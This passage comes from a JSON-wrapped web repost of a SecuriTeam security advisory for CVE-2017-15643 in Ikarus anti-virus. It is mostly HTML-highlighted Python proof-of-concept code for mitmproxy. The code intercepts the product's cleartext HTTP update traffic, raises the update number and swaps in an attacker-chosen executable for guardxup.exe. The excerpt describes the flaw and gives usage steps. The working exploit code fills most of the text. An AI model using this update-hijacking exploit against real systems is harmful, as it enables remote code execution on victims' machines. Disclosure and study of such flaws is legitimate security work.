class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">original_update_number<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-66\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_replace<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">replace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">original_update_number<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_replace<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">content<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-69\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-70\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;cgi-bin\/virusutilities.pl&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">path <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'virusutilities'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">'User-Agent'<\/span><span class=\"crayon-sy\">]<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">already_patched<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-71\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;[*] Found update response, modifying...&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">content<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">compile<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;update[\\s|\\t].*\\n&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">the_result<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">original_update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">the_result<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">isdigit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">original_update_number<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-79\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_replace<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'[*] Update_number'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">update_number<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-81\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'[*] Replace number'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">to_replace<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-82\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">replace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">original_update_number<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_replace<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;[*] Updated content&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">content<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-84\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">content <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-85\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-86\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'guard'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-e\">path <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'full'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">path <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">already_patched<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;[*] Found guardxup.exe request! 
Modifying request and pushing provided file!&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">crc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">backdoored_file<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">win_header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">with <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">backdoored_file<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;rb&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">file_out<\/span><span 
class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file_out&nbsp;&nbsp;&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-93\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">with <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/tmp\/update_test.full&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;wb&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">content <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-96\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">already_patched<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-98\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">reply<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-99\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-100\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-101\"><span class=\"crayon-v\">config<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proxy<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ProxyConfig<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">8080<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mode<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;transparent&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-102\"><span class=\"crayon-v\">server<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ProxyServer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">config<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-103\"><span class=\"crayon-v\">m<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">IkarusPOC<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-104\"><span class=\"crayon-v\">m<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">run<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3542\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 27 Nov 2017 07:50:39 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following security advisory describes a remote code execution vulnerability found in Ikarus Anti Virus 2.16.7. IKARUS 
anti.virus \u201cprotects your personal data and PC from all kinds of malware. In addition, the anti-spam module protects users from spam and from malware in e-mail. Choose the award-winning IKARUS scan engine to protect yourself effectively against cyber criminals. IKARUS is the best scan engine in the world, detecting unknown and known threats every day.\u201d Credit An independent security researcher reported this vulnerability to Beyond Security's SSD. Vendor Response Update 1 CVE: CVE-2017-15643 The vendor has released patches for these vulnerabilities. For more information: https:\/\/www.ikarussecurity.com\/about-ikarus\/security-blog\/vulnerability-in-windows-antivirus-products-ik-sa-2017-0001\/ Vulnerability Details A network attacker (man-in-the-middle) can achieve remote code execution on a computer running Ikarus anti-virus software. Ikarus AV for Windows updates over cleartext HTTP, using a CRC32 checksum and an update value to verify the downloaded file. In addition, ikarus checks the update version number; by increasing the update version number, the update process can be pushed to perform an update. 
The executable that performs updates in ikarus is guardxup.exe. guardxup.exe sends its update request over port 80 as follows: [crayon-5a1c8f5b8564c832670696\/] The server responds as follows: [crayon-5a1c8f5b85655113594378\/] Through a proxy, we can modify the response, add 1 to the \u201cupdate\u201d value, and forward the response to the client. The client will then request the update via this URL: http:\/\/mirror04.ikarus.at\/updates\/guardxup001005048.full The ikarus server will return 404: [crayon-5a1c8f5b8565a461056357\/] But we can modify that response using the IKUP format: [crayon-5a1c8f5b8565f465486246\/] We then forward the modified response to the client, where guardxup.exe is replaced with our executable. Proof of Concept Install mitmproxy 0.17 &#8211; pip install mitmproxy == 0.17 To use this script, forward the client's traffic through the man-in-the-middle on port 80 in transparent proxy mode. Set your firewall rules to intercept the traffic on port 8080: [crayon-5a1c8f5b85664388983146\/] Then run the script as follows: .\/poc.py file_to_deploy.exe 
[crayon-5a1c8f5b85668324361117\/]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,11682,10757,12136],"class_list":["post-10623","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10623","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10623"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/w